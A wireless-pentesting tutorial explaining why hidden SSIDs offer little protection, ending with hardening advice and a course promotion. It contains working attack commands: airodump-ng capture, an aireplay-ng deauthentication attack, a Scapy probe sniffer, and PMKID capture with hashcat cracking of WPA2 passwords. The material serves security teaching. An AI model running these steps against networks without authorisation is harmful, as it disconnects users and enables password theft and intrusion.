Hidden SSIDs are one of those security measures that feel effective but provide almost no real protection against a determined attacker. Here’s why — and exactly how they’re defeated.

Why Hidden SSIDs Exist (and Why They Don’t Help)

When a network administrator hides an SSID, the access point stops broadcasting its name in beacon frames. The SSID field is zeroed out. The idea is that potential attackers won’t know the network exists.

The problem: the SSID still appears in probe request and probe response frames. Any client that has previously connected to the network will actively probe for it, broadcasting the SSID into the air every time it looks for known networks.

Monitor mode is all you need to see it.

Step 1: Capturing the SSID Passively

1
2

sudo airmon-ng start wlan0
sudo airodump-ng wlan0mon

Hidden networks appear as <length: N> in airodump-ng output — the N tells you how many characters the SSID contains. Wait for a client to probe, and the SSID appears in the STATION section.

Step 2: Forcing the Reveal Actively

If no clients are actively probing, send a deauthentication frame to force a reconnect:

1

sudo aireplay-ng -0 3 -a <BSSID> -c <CLIENT_MAC> wlan0mon

When the client reconnects, its probe request contains the SSID in plaintext.

Step 3: Revealing with Scapy

For a more controlled approach using Python:

1
2
3
4
5
6
7
8
9

from scapy.all import *

def sniff_probes(pkt):
    if pkt.haslayer(Dot11ProbeReq):
        ssid = pkt[Dot11Elt].info.decode('utf-8', errors='replace')
        if ssid:
            print(f"[+] Probe Request: {ssid} from {pkt[Dot11].addr2}")

sniff(iface="wlan0mon", prn=sniff_probes, store=False)

Step 4: Cracking the Password

Once you have the SSID, the attack surface is identical to any other WPA2 network:

1
2
3
4
5
6
7
8

# PMKID capture (no client needed)
sudo hcxdumptool -i wlan0mon -o capture.pcapng --enable_status=1

# Convert for hashcat
hcxpcapngtool -o hashes.txt capture.pcapng

# Crack
hashcat -m 22000 hashes.txt wordlist.txt -r rules/best64.rule

The Bottom Line

Hidden SSIDs provide security through obscurity — and obscurity isn’t security. The SSID is always revealed in probe frames. Any client on the network will hand it to a passive observer.

If you’re relying on hidden SSIDs to protect a sensitive network segment, replace that with strong WPA3 passphrases, network segmentation, and certificate-based authentication.

New to wireless pentesting? This technique is just one of many covered in the WiFi Novice to Professional short-course — a structured path from zero to confidently assessing wireless networks, covering the tools, techniques, and methodology you need.